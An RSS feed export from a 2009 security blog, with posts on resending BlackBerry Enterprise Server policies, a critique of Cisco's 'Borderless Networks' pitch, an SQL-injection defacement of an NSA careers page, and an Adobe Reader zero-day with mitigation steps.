<li>Depending on your version, open the BlackBerry Enterprise Server Management console or BlackBerry Manager.</li>
<li>Select the BlackBerry Enterprise Server name, then right-click a BlackBerry device user name.</li>
<li>Click <b>Properties</b>.</li>
<li>On the IT Admin tab, click <b>Resend policy</b>.</li>
<li>Click <b>Apply</b>, then click <b>OK</b>.</li>
</ol>

<p>BlackBerry Enterprise Server software version 4.1</p>

<ol>
<li>In BlackBerry Manager, select the BlackBerry Enterprise Server name.</li>
<li>Select a BlackBerry device user, then click the question mark (<b>?</b>) symbol beside <b>IT Admin</b>.</li>
<li>From the menu that appears, you can resend the IT policy or assign an IT policy to a BlackBerry device user.</li>
<li>Click <b>OK</b>.</li>
</ol>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/">iPhone 4 Ordering and Session Switching</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/05/mays-patch-tuesday/">May&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/3473/">March&#8217;s Patch Tuesday</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/first-patch-tuesday-of-2010/">First Patch Tuesday of 2010</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/10/where-is-your-bes-policy/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Are Borderless Networks Possible?</title>
		<link>http://praetorianprefect.com/archives/2009/10/borderless-networks-yeah-but-wheres-my-border/</link>
		<comments>http://praetorianprefect.com/archives/2009/10/borderless-networks-yeah-but-wheres-my-border/#comments</comments>
		<pubDate>Thu, 15 Oct 2009 19:27:33 +0000</pubDate>
		<dc:creator>Jeremy Rossi</dc:creator>
				<category><![CDATA[Administration]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[Networking]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[borderless networks]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[iphone]]></category>
		<category><![CDATA[policy]]></category>
		<category><![CDATA[vpn]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=980</guid>
		<description><![CDATA[I attended SC World Congress in New York this week and a keynote from Cisco caught my attention: Securing the Cloud: Building the Borderless Network.  I became fixated on the words used over and over by Joel McFarland. Borderless this, borderless that, borderless everything.  This campaign started to bother me as this was [...]]]></description>
			<content:encoded><![CDATA[<p>I attended <a href="http://www.scmagazineus.com/SC-World-Congress-2009/section/886/">SC World Congress</a> in New York this week and a keynote from Cisco caught my attention: <em>Securing the Cloud: Building the Borderless Network</em>.  I became fixated on the words used over and over by <a href="http://www.scmagazineus.com/Joel-McFarland-senior-manager-Product-Management-Security-Technology-Group-Cisco-Systems/article/149536/">Joel McFarland</a>. Borderless this, borderless that, borderless everything.  This campaign started to bother me, as this was a security conference and a network company was pushing the idea of fewer borders.  It seemed off, wrong, and incomplete to me.</p>

<h2>Little Bit of History</h2>

<p>I am going to quickly cover some of the history of the Internet and how it grew borders, but please skip to the highlight of the article if you are familiar with this already: <a href="#borderless-what">Borderless Networks, What?</a></p>

<h5>ARPANET (&#8217;69&#8211;&#8217;91)</h5>

<p>In the beginning, there was <a href="http://en.wikipedia.org/wiki/ARPANET">ARPANET</a>, which pioneered packet switching networks and gave providers a choice of the method and hardware they would use to communicate.  However, the base protocol used for devices to communicate on ARPANET was NCP.  The NCP protocol could best be described as a network device driver rather than a network transport stack. It had no method for end-to-end error handling, which was recognized as a problem, but nothing was done about it until 1983.</p>

<p>In 1983, TCP/IP replaced NCP as the transport protocol and ARPANET became a part of what was to become the Internet.  TCP/IP was a huge improvement over NCP in that it accounted for problems on the network and kept the network from coming to a grinding halt when packets were lost.  It also achieved the concept of end-to-end connectivity between hosts.  This meant that as long as two hosts were on the Internet they could reach each other using standard TCP/IP.  This standard framework also led to the growth of many different applications, as there was no longer any need to make changes to the network to add new applications or protocols.</p>

<h5>First Borders (&#8217;91&#8211;&#8217;94)</h5>

<p>All the building blocks were in place, and what formed was a large group of interconnected networks sharing and exchanging data. Then the first virus and worm hit, in 1983 and 1988 respectively.  The <a href="http://en.wikipedia.org/wiki/Morris_worm">Morris worm</a> gained a fair amount of media attention and in fact prompted the establishment of <a href="http://www.cert.org/">CERT</a>.  Even at this embryonic stage, the value of the information being shared caused many researchers to begin placing limitations on the end-to-end connectivity of their hosts.  Thus began the <em>&#8216;Us&#8217;</em> and <em>&#8216;Them&#8217;</em> status of the Internet.</p>

<p><em>&#8216;Us&#8217;</em> and <em>&#8216;Them&#8217;</em> started out simple, with a move to keep networks segregated, or, put another way, to add a border between the networks.   At first, the borders were nothing more than routers that kept the effects of network <em>A</em> from spilling over into network <em>B</em>.  They were effective, but in 1991 <a href="http://en.wikipedia.org/wiki/Digital_Equipment_Corporation">DEC</a> released the first modern firewall: SEAL.  This marked the first real security border on the Internet, where all packets were inspected and compared to a set of policy rules before being passed on.  These first security borders were instrumental in providing the trust and assurance in the network that companies and researchers required, speeding the growth of the Internet.  While intrusion was still possible, the bar of entry was raised beyond casual attacks and probes.</p>

<div class="wp-caption" style="float: right;margin: 5px;margin-left: 42px;margin-right: 21px;"><a title="Figure 1: Us vs. Them" rel="lightbox" href="http://praetorianprefect.com/wp-content/uploads/2009/10/us-them.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/us-them.png" border="1" alt="Us vs Them" width="300" height="233" /> </a>
<p class="wp-caption-text"><a title="Figure 1: Us vs. Them" rel="lightbox" href="http://praetorianprefect.com/wp-content/uploads/2009/04/man-example.png">Figure 1: Us vs. Them</a></p></div>

<p>In 1992, the dominant addressing of hosts was IPv4, where each host is assigned a 32-bit address.  This limited the total number of addressable hosts to 4,294,967,296, and, due to reservations and subnetting, even that could never be fully utilized.  At this time it was recognized that the IPv4 limitations would become a problem in the future, which began the process of creating a new IP protocol with a much higher number of addressable hosts. IPv6 was born in 1994, based on a 128-bit address for each host.  This would effectively allow every man, woman, and child on Earth to be assigned an address many times over.  As part of the formation of IPv6, security between networks was also taken into account, and <a href="http://en.wikipedia.org/wiki/IPsec">IPSec</a> was created as a requirement of the IPv6 protocol.</p>

<p>IPv6&#8217;s creation gave the Internet a secure method of communication between networks via IPSec and nearly unlimited address space, but IPv6 did not get off the ground quickly.  This was mostly due to the fact that all devices and operating systems would need to be upgraded to handle the new protocol, and there was little to no pressure from the market to push things forward.   IPSec, on the other hand, did take off, as it quickly became the standard method for interconnecting trusted networks over an untrusted medium (such as the Internet).</p>

<p>At the same time that IPv6 and IPSec were being developed, another group of people began working on an alternate method for dealing with the lack of addressable space in IPv4.  <a href="http://en.wikipedia.org/wiki/Network_address_translation">Network Address Translation (NAT)</a> was published in <a href="http://www.ietf.org/rfc/rfc1631.txt">RFC1631</a> in 1994 as a short term solution while the larger problems were being addressed.  NAT became very successful quickly, as it allows a very large number of hosts to access the larger Internet while using very few publicly addressable IP addresses.  As with most things, NAT came with some trade-offs.  One of the big ones was that hosts no longer had complete end-to-end connectivity.  Thus another border on the network was created; in practice, firewalls became the dominant NAT devices.  Nonetheless, the NAT border would create problems for application developers for years to come.</p>

<h5>Present (&#8217;09)</h5>

<p>In 2009, the way the Internet runs is really not very different from 1994:  IPv6 is just now getting underway, NAT is used everywhere, and IPSec still secures networks over an untrusted medium. What has changed in a big way is the applications and uses of the Internet.  Telephone calls commonly use the Internet for transport, on demand video is a huge source of traffic, social media networks garner huge numbers of users, online shopping is an important revenue stream for companies, and most recently more and more services are being hosted elastically on demand via the Internet.</p>

<h2 id="borderless-what">Borderless Networks. What?</h2>

<p>Now let&#8217;s get back to Borderless Networks&#8230;</p>

<p>Cisco envisions a global network where you can go any place and access any data you could need at anytime.  John Chambers detailed the approach on a video at <a href="http://cisco.com">Cisco.com</a>:</p>

<div class="wp-caption" style="display: block;text-align: left;margin: 5px;margin-left: 10px;">
&#8220;In terms of what&#8217;s happening right now, I think the biggest market transition is the shift to a more collaborative world, which is only made possible by what we call an &#8220;intelligent, network-centric&#8221; world. This network-centric world encompasses the whole range of communication experiences and seamlessly delivers information. Consumers will access voice, the web, e-mail, and video by any of the 14 billion devices that we think will be connected to the internet by 2010, all loaded onto the network. In the very near future, for example, you won&#8217;t need to hang up your cell phone if you want to switch to a landline; you&#8217;ll stay connected as you change devices, as long as they&#8217;re all connected to a network.&#8221;
<p class="wp-caption-text"><a href="http://www.cisco.com/survey/exit.html?http://discussionleader.hbsp.com/hbreditors/2008/10/cisco_ceo_john_chambers_on_tea.html">Cisco CEO John Chambers talks about Cisco&#8217;s collaborative management model</a></p>
</div>

<p>Cisco also has a <a href="http://www.cisco.com/web/solutions/netsys/g2/index.html?POSITION=social+media&amp;COUNTRY_SITE=us&amp;CAMPAIGN=Transformers+Launch&amp;CREATIVE=Borderless+Networks+to+Index&amp;REFERRING_SITE=Twitter">virtual event</a> on Oct 20th for Borderless Networks, and has been encouraging people to register via <a href="http://twitter.com/CiscoGeeks">Twitter</a> and email for the last two weeks.</p>

<div class="wp-caption" style="float: right;width: 450px;text-align: left;margin: 5px;margin-left: 20px;">

LUNCH &#8211; Securing the cloud: Building the borderless network
An exploration into the “cloud” revealing the power of choice in email security. Learn how to harness all the benefits that the cloud has to offer while avoiding common pitfalls for early SaaS solutions. The crumbling walls of network perimeters are forcing organizations to architect new network designs to address the evolution of borderless networks. <br />
<br />
Attend this session and learn:<br />
- Embracing the change to borderless networks<br />
- Understanding Cisco&#8217;s next-generation cloud security architecture<br />
- Realizing the power of choice in choosing an email security solution<br />
<br />
- Joel McFarland, senior manager in the product management team within the Security Technology Group at Cisco Systems<br />

<p class="wp-caption-text"><a href="http://www.scmagazineus.com/Agenda-Day-1-2009/section/888/">SC World Congress: Agenda Day 1</a></p>
</div>

<p>I first learned of the Borderless Networks push during the <a href="http://www.scmagazineus.com/SC-World-Congress-2009/section/886/">SC World Congress</a>.  I was there to get a preview of Borderless Networks as presented by Joel McFarland.  The session description sounded interesting and as it was a keynote there was nothing else to pull on my time.</p>

<p>Two co-workers and I attended the session, but being a little late we had to make our way to the very front of the room to find seats.  Up front we were able to hear and see everything in great detail, but in hindsight this might have not been the best place for us. There was no way Joel could have missed the looks of skepticism on all three of our faces.</p>

<p>Joel pushed the Cisco idea of Borderless Networks in many different ways, but pointed to the <a title="Figure 2: The iPhone" rel="lightbox" href="http://praetorianprefect.com/wp-content/uploads/2009/10/iphone_home.gif">iPhone</a> as the game changer, the beginning of things to come.  The iPhone and salesforce.com then became his prime example of how a mobile sales team can be almost completely disconnected from the enterprise network.  They access leads, manage contacts, input orders, and exchange notes and information all without ever logging into the corporate network.  At this point, I looked to my co-workers with a questioning expression and whispered the rhetorical question &#8220;<em>No corporate login?</em>&#8221;.</p>

<p>The example Joel used is common for a sales workforce, and is actively encouraged in many environments, but it is something I have always felt was wrong.  In many companies, sales leads are valuable information and something that competitors, and even other sales people, would actively try to gain access to.  When all access to this information is controlled by an external party you are no longer able to apply your own controls. In fact, you are beholden to the policies and procedures of the provider.  Joel was one step ahead of me on this.  He pointed out the problems that were playing through my head and countered that salesforce.com can be made to use a corporation&#8217;s internal authentication methods (Active Directory, RSA tokens, etc.).  As such, your internal policies for granting and removing access are once again in your control.  I conceded. Joel is correct that salesforce.com can be brought into line with one&#8217;s internal security policy, but he does not address the issue of the remote device: the iPhone itself.</p>

<h4>Borderless</h4>

<p>Let me come back to the iPhone in a bit; first I want to point out another slide that came up during this iPhone praise.  In <a title="Figure 2: Before &#038; After" rel="lightbox" href="http://praetorianprefect.com/wp-content/uploads/2009/10/iphone_home.gif">Figure 2</a> I have created a combined version of the two slides Joel was showing to demonstrate the future of networking (I have recreated them from memory, but it&#8217;s close enough for this post).</p>

<div class="wp-caption" style="float: right;margin: 5px;margin-left: 42px;margin-right: 21px;"><a title="Figure 2: Before &#038; After" rel="lightbox" href="http://praetorianprefect.com/wp-content/uploads/2009/10/before-after_borderless.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/before-after_borderless.png" border="1" alt="Us vs Them" width="500" height="400" /> </a>
<p class="wp-caption-text"><a title="Figure 2: Before &#038; After" rel="lightbox" href="http://praetorianprefect.com/wp-content/uploads/2009/10/iphone_home.gif">Figure 2: Before &#038; After</a></p></div>

<p>In Figure 2, we have the <strong>before</strong> and <strong>after</strong> sections.  According to Joel, the <strong>before</strong> example is currently a good summary of how most enterprise networks allow access into and between their networks.  This Joel and I agree on.</p>

<p>As seen in the <strong>before</strong> section, you have a defined entry point into the network from outside, where all external resources gain access.  This is your border between &#8220;<em>us</em>&#8221; and &#8220;<em>them</em>&#8221;.  In the examples, both the remote home desktop and the iPhone access the network and are allowed past the border only if proper authentication and authorization have taken place.  Once that is completed, the remote device is granted access to the resources it needs to function as an effective job tool: access to the Internet via an internal proxy, access to files in the London office, or logging into the salesforce.com website.  The key thing is that all access flows through this single point of entry.</p>

<p>By restricting access for remote devices to a single point, we are able to overcome some technical shortcomings and greatly reduce the vectors of attack for the network.  NAT is required due to the limited number of publicly routable addresses, so end-to-end connectivity is not an option for the remote devices.  Using IPSec for transport and assigning an RFC 1918 address to the remote end of the IPSec tunnel allows one to overcome the NAT limitations.  This gives the remote device end-to-end connectivity within the enterprise network.  With this method the network administrators are able to capture and monitor all access into and out of the network at a single point.  NAC, IPS/IDS, and other methods of monitoring are commonly deployed here.</p>

<p>With the <strong>after</strong> diagram of Figure 2, we see the future as Cisco and Joel see it.  This is where all resources are able to access all other resources, also known as complete end-to-end connectivity.  Joel did not say how this was to be achieved, but given the network diagram it&#8217;s not hard to surmise that Cisco is planning a big push for IPv6.  IPv6 will allow for this type of network, and will bring down the NAT boundary.  With it the technical limitation of too few addresses for end-to-end connectivity on the Internet is eliminated, and things can get a lot more complex, as we see in the <strong>after</strong> section of the diagram.</p>

<p>On the <strong>after</strong> diagram you see end-to-end connectivity to each resource both inside the network and outside.  We have an iPhone going directly to salesforce.com, directly accessing a file in the London office, and able to access all the data it could ever need.  What about limiting access to resources? How do you make sure that a remote home desktop does not start copying all of the data from the London office, NYC office, and salesforce.com to a remote site?  What if the desktop is infected with malware?  How do you log the activity of the remote device&#8217;s access? All these questions become much harder when you have complete end-to-end connectivity, and historically we have learned that it becomes an even larger problem when remote devices are involved.</p>

<p>All the questions I have asked about the security of the <strong>after</strong> section can be answered with products already on the market, and in fact these are recommended for use in both networks.  The problem becomes the scale that is needed to protect and defend a network that has complete end-to-end connectivity.  Once again, going back to the <strong>after</strong> diagram and taking into account only remote device access, the number of policies that need to be maintained, protected, and monitored goes from 1 to 4.  Now a growth of 400% is big, but almost manageable. If you start to think about a small enterprise with 20 offices, 2 datacenters, and 200 remote users, the problem of scale is instantly untenable.</p>

<p>IPv6 will solve a lot of problems for networks, as the need for NAT will go away and devices will be able to directly address each other across networks and boundaries, but as with just about everything there are side effects.  Keeping control of access into and out of your network is the first line of defense, and with IPv6 this becomes a policy and enforcement issue even though it is no longer a technical requirement.</p>

<h4>The iPhone, Key to the Borderless Network</h4>

<p>Joel said he likes his iPhone, and from the huge number of videos from Cisco featuring an iPhone it&#8217;s safe to assume Cisco does too.  During the keynote Joel pointed to the iPhone a few times in a number of examples, and generally with heavy praise.  Joel and I agree the iPhone is an amazing device, an important step forward in mobile computing.  After this Joel and I begin to disagree, namely around one key point: &#8220;<em>The iPhone is a game changer.</em>&#8221;  I think that statement needs to add &#8220;<em>for the consumer market</em>&#8221;.</p>

<div class="wp-caption" style="float: left;margin: 5px;margin-left: 5px;margin-right: 21px;"><a title="Figure 3: The iPhone" rel="lightbox" href="http://praetorianprefect.com/wp-content/uploads/2009/10/us-them.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/iphone_home.gif" border="1" alt="Us vs Them" width="200" height="330" /> </a>
<p class="wp-caption-text"><a title="Figure 3: The iPhone" rel="lightbox" href="http://praetorianprefect.com/wp-content/uploads/2009/10/iphone_home.gif">Figure 3: The iPhone</a></p></div>

<p>The iPhone lets users reach the Internet from almost anywhere; it&#8217;s one of the most popular cameras on <a href="http://www.flickr.com/cameras/">flickr</a>, it has a huge list of applications, and, for some people, it is a complete replacement for the traditional computer.  While its strong points work well in the consumer market, in the enterprise market it&#8217;s a very different beast.  In fact the strongest points for the iPhone in the consumer market are security concerns for the enterprise.  Application controls are limited, centralized control is even more limited, and encryption of the data residing on the device is a <a href="http://www.wired.com/gadgetlab/2009/07/iphone-encryption/">problem</a> on the most fully featured phone to date.</p>

<p>Devices like the iPhone should be thought of less as a phone and more as a laptop. With that comes all the same protections and controls that we use to mitigate risk on an enterprise laptop. Here is a quick list of what I expect from a laptop and by extension from an iPhone for it to become a viable remote access device in the enterprise environment:</p>

<ul>
<li>Anti-virus and anti-malware software with centralized reporting</li>
<li>Secure communications for the device; both internal resources and the ability to define policies</li>
<li>Strong Data Encryption on the device</li>
<li>Ability to do remote kill of device</li>
<li>Application installation and run controls</li>
<li>Web Filter/Proxy controls</li>
<li>Access controls, password complexity settings and password failure data destruction</li>
</ul>

<p>Some of the areas listed are available on the iPhone, but none of them is anywhere near complete and ready for everyday use in an enterprise.  <a href="http://www.rim.com/">Research In Motion</a> (RIM) dominates the enterprise market for the reasons I have listed here.  RIM, via the BlackBerry Enterprise Server (BES), gives the enterprise complete control of every device that connects, through a centralized management station.  BES also handles network traffic correctly in that all devices come back to the BES at a single point of entry into the enterprise.  This allows an enterprise to place additional controls directly at the BES rather than on multiple devices all over the network.  RIM&#8217;s BES product represents the minimum level of security that should be expected for remote access by phone-like devices. I would go so far as to say it should be the starting standard for how remote access devices should behave.</p>

<p>The iPhone might be the start of things to come, but in no way is it even close to ready for the enterprise market.</p>

<h2>Why?</h2>

<p>Cisco&#8217;s push with Borderless Networks is either something that they haven&#8217;t completely vetted from a security perspective, or the security strategy isn&#8217;t completely explained in the marketing.  The huge increase in the number of points needing protection, the corresponding increase in policy and management, and the management of data flow and access controls are areas that need addressing.  These are problems we still have trouble controlling with our current network deployments.  Unless Cisco has a magic bullet coming out of their research and development departments, I don&#8217;t see how this move to Borderless Networks is even possible.</p>

]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/10/borderless-networks-yeah-but-wheres-my-border/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>NSA.gov Site Defacement</title>
		<link>http://praetorianprefect.com/archives/2009/10/nsa-gov-site-defacement/</link>
		<comments>http://praetorianprefect.com/archives/2009/10/nsa-gov-site-defacement/#comments</comments>
		<pubDate>Tue, 13 Oct 2009 21:02:24 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Cyberwar]]></category>
		<category><![CDATA[Featured]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Web Site Defacement]]></category>
		<category><![CDATA[hacker groups]]></category>
		<category><![CDATA[hacktivism]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=926</guid>
		<description><![CDATA[It appears, according to the site defacement archive hosted at Zone-H, that on or around October 5th an NSA web site application was the victim of an SQL injection exploit resulting in a web site defacement. A web application loading a list of recruitment events at colleges was compromised on the careers section of <a href="http://www.nsa.gov/applications/careers/recruit_events/">nsa.gov</a>.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/nsahack_thumb.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/nsahack_thumb-150x150.jpg" alt="nsahack_thumb" title="nsahack_thumb" width="150" height="150" class="alignleft size-thumbnail wp-image-928" /></a>It appears, according to the site defacement archive hosted at Zone-H, that on or around October 5th an NSA web site application was the victim of an SQL injection exploit resulting in a web site defacement. A web application in the careers section of <a href="http://www.nsa.gov/applications/careers/recruit_events/">nsa.gov</a> loading a list of recruitment events at colleges was compromised.</p>

<h3>10/05/2009 Appearance</h3>

<div id="attachment_931" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/nsa_hack11.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/nsa_hack11-300x271.jpg" alt="Site appearance according to posting on Zone-H." title="nsa_hack1" width="300" height="271" class="size-medium wp-image-931" /></a><p class="wp-caption-text">Site appearance according to posting on Zone-H.</p></div>

<h3>Correct Appearance</h3>

<div id="attachment_927" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/nsa_hack2.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/nsa_hack2-300x239.jpg" alt="NSA Career Fair schedule, correct appearance." title="nsa_hack2" width="300" height="239" class="size-medium wp-image-927" /></a><p class="wp-caption-text">NSA Career Fair schedule, correct appearance.</p></div>

<h3>SQL_Master</h3>

<p>The attacker, using the handle SQL_Master, is attributed on Zone-H with site defacements of Google Tokelau (Tokelau is a territory of New Zealand) and a Microsoft web property in Korea. He has been associated with the Jurm team, a Moroccan hacker group known primarily for defacements of the Israeli versions of major companies&#8217; web sites, for example Kia, Sprite, and Fanta.</p>

<p>A Microsoft defacement attributed to SQL_Master from July of this year references &#8220;Agd_Scrop, free him&#8221;. Agd_Scorp was part of a Turkish hacker group called Peace Crew that defaced NATO and U.S. military web sites as a political reaction to Operation Cast Lead or, as it is more commonly known, the Gaza War, in which Israeli and Hamas forces clashed starting in December of 2008. The two hacker groups are known to have partnered in defacements at the beginning of this year during the conflict, in what was termed a virtual war in which a few thousand Israeli web sites were defaced. Agd_Scorp appears to have been arrested by Kayseri (central Turkey) police over the summer, and faces up to 20 years in prison on various cybercrime related charges.</p>

<h3>National Security Agency</h3>

<p>The NSA or National Security Agency is the cryptologic intelligence agency of the United States. Created in 1952 under President Truman, its primary initial responsibility was the collection and analysis of foreign communications. In 2008 President George W. Bush signed a directive authorizing the NSA to monitor the computer networks of all federal agencies, giving the agency a primary role in federal efforts around cybersecurity.</p>

<p>Because of this role and other factors, including the agency&#8217;s historical role with cryptographic systems and controversial domestic wiretapping programs, NSA networks and computer systems are an attractive target for crackers. Further, because of the agency&#8217;s role in cybersecurity monitoring, defacements such as this one are embarrassingly problematic.</p>

<h3>Zone-H.org</h3>

<p><a href="http://www.zone-h.org">Zone-H.org</a>, a site hosted in France which has been around since 2002, hosts an archive of defaced web sites. In January 2007 the site itself was a victim of a pseudo defacement, when a team from Saudi Arabia gained access to the registrar&#8217;s administrative panel and redirected the zone-h.org domain name to a different IP. The site&#8217;s mission is very similar to the defacement archive that used to be maintained at <a href="http://attrition.org">attrition.org</a>. Both have been the subject of criticism over the years, the suggestion being that hosting the archive is itself an incentive for site defacements. The counter to this is that without the central archiving of the evidence of web site defacements, the problem would be less known and understood by the security community. Companies may also try to sweep such episodes under the rug. Besides, the site defacements would simply be posted in other places (forums and similar web sites).</p>

]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/10/nsa-gov-site-defacement/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Adobe to release critical update on patch Tuesday</title>
		<link>http://praetorianprefect.com/archives/2009/10/adobe-to-release-critical-update-on-patch-tuesday/</link>
		<comments>http://praetorianprefect.com/archives/2009/10/adobe-to-release-critical-update-on-patch-tuesday/#comments</comments>
		<pubDate>Fri, 09 Oct 2009 15:03:50 +0000</pubDate>
		<dc:creator>Simon Price</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[adobe]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[patch]]></category>
		<category><![CDATA[patch tuesday]]></category>
		<category><![CDATA[reader]]></category>
		<category><![CDATA[updates]]></category>
		<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[zero-day]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=882</guid>
		<description><![CDATA[A new zero-day vulnerability in Adobe Reader and Acrobat 9.1.3 has been identified by Chia-Ching Fang and the Taiwanese Information and Communication Security Technology Service Center that allows an attacker to remotely execute arbitrary code. The attack is seeded by providing via e-mail or download a specially crafted PDF file which in current examples will then drop a malware executable as well as an unaffected pdf file.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/adobelq1.png"><img style="border-bottom: 0px; border-left: 0px; display: inline; border-top: 0px; border-right: 0px" title="adobe-lq" border="0" alt="adobe-lq" src="http://praetorianprefect.com/wp-content/uploads/2009/10/adobelq_thumb1.png" width="47" height="76" /></a></p>

<p>A new zero-day vulnerability in Adobe Reader and Acrobat 9.1.3 has been identified by Chia-Ching Fang and the Taiwanese Information and Communication Security Technology Service Center that allows an attacker to remotely execute arbitrary code. The attack is seeded by delivering, via e-mail or download, a specially crafted PDF file which, in the examples seen so far, then drops a malware executable as well as an unaffected PDF file. McAfee is identifying this as Exploit-PDF.m, and already has a signature for a specific Trojan that has been identified. This is the fourth PDF related zero-day attack of 2009, and a further incentive for enterprises to bring patching of applications in line with their processes for operating system patching.</p>

<p>The crafted PDF file contains JavaScript that is used to execute arbitrary code via a technique known as heap spraying. The initial shellcode jumps program execution to a second shellcode, which in turn executes a malicious file that creates a backdoor (remote access to the infected computer). <a href="http://blog.trendmicro.com/new-adobe-zero-day-exploit/">Trend Micro</a> is identifying this malware as a Protux variant. Protux backdoors provide user level access to the machine and have been seen as the payloads of Microsoft Office (Word, PowerPoint, Excel, Access) exploits as well as of previous Adobe Reader exploits. The Protux family of Trojans has been around since at least 2007.</p>

<p>The identification of this exploit has prompted Adobe to announce a critical patch for release on Tuesday, October 13th. The company posted a <a href="http://www.adobe.com/support/security/bulletins/apsb09-15.html">security advisory</a> yesterday, announcing plans to release the update to &#8220;resolve critical security issues&#8221;. The vulnerability is being exploited, although it is unclear how widespread the attacks are. Adobe asserts that the vulnerability is being exploited in &#8220;limited, targeted attacks&#8221; against Windows operating systems only, although the vulnerability itself also exists on other operating systems.</p>

<blockquote>
  <p>&#8220;There are reports that this issue is being exploited in the wild in limited targeted attacks&#8221;<br /> – David Lenoe of Adobe</p>
</blockquote>

<p>Vupen Security posted an <a href="http://www.vupen.com/english/advisories/2009/2851">advisory</a> on the vulnerability (CVE-2009-3459) which states that the issue is an unspecified memory corruption error that could be exploited to allow attackers to compromise a system remotely.</p>

<h3>Workarounds</h3>

<h4>Disabling Javascript on Adobe Acrobat</h4>

<p>Adobe notes that disabling JavaScript mitigates the specific exploit identified, although it would be possible to create a variant that does not rely on JavaScript.  To disable JavaScript in Adobe Reader or Acrobat, select Edit > Preferences, select the JavaScript option on the left, and uncheck the <i>Enable Acrobat JavaScript</i> option as shown.</p>

<div id="attachment_916" class="wp-caption alignnone" style="width: 650px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/AcrobatPreferences.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/AcrobatPreferences.png" alt="Uncheck to disable Acrobat JavaScript" title="AcrobatPreferences" width="640" height="424" class="size-full wp-image-916" /></a><p class="wp-caption-text">Uncheck to disable Acrobat JavaScript</p></div>

<h4>Data Execution Prevention</h4>

<p>Also, users with DEP enabled on Windows Vista or Windows 7 are protected from this exploit. Data Execution Prevention (DEP) performs additional checks on memory to help prevent malicious code from running, and is designed to stop buffer overflow attacks from executing injected code. To enable DEP on Windows for all or individual programs, go to Control Panel -> System and Maintenance -> System, click Advanced System Settings, click Settings under Performance, and finally, under the Data Execution Prevention tab, select <i>Turn on DEP for all programs and services except those I select</i>. If you cannot find Acrobat in the list of programs, click Add, browse to the Acrobat executable (.exe) file, and click Open.  For more information on DEP settings, visit the <a href="http://windows.microsoft.com/en-us/windows-vista/Change-Data-Execution-Prevention-settings">Microsoft help page</a>.</p>

<h3>In Conclusion</h3>

<p>In June Adobe moved to the same Tuesday patch management schedule that Microsoft and Oracle previously adopted. This latest zero-day exploit represents another opportunity to address an ongoing issue for organizations: patch management must extend beyond just the operating system level. While enterprises focus on ensuring the latest Microsoft updates reach the desktop and server environment, applications such as Adobe Reader fail to be part of the same rigorous patch management exercise.</p>

<p>Qualys demonstrated this problem when the first Adobe exploit was released this year in February, APSA09-01.  While a fix was released on March 10th (demonstrated by the red line in their graph), by April 27th there was still no clear reduction in the number of vulnerable machines. A 30 day patch management cycle, including testing of the patch before full enterprise release, would have shown a steep drop off on or about April 10th:</p>

<div id="attachment_914" class="wp-caption alignnone" style="width: 609px"><a href="http://praetorianprefect.com/wp-content/uploads/2009/10/adobe_april_09.png"><img src="http://praetorianprefect.com/wp-content/uploads/2009/10/adobe_april_09.png" alt="Source: http://laws.qualys.com/lawsblog/2009/04/new-adobe-0-day-vulnerability.html" title="adobe_april_09" width="599" height="341" class="size-full wp-image-914" /></a><p class="wp-caption-text">Source: http://laws.qualys.com/lawsblog/2009/04/new-adobe-0-day-vulnerability.html</p></div>

<p>In March Adobe patched a two-month-old zero-day exploit, followed by another patch in May to block a second zero-day attack. In July a fix was released for a Flash PDF related flaw.  As evidenced by the four exploits thus far this year, Adobe applications are becoming an increasingly attractive target for bad actors.</p>

]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2009/10/adobe-to-release-critical-update-on-patch-tuesday/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Colbert&#8217;s Human DDOS</title>
		<link>http://praetorianprefect.com/archives/2009/10/colberts-human-ddos/</link>
		<comments>http://praetorianprefect.com/archives/2009/10/colberts-human-ddos/#comments</comments>
		<pubDate>Thu, 08 Oct 2009 06:37:29 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[ddos]]></category>
		<category><![CDATA[wiki]]></category>

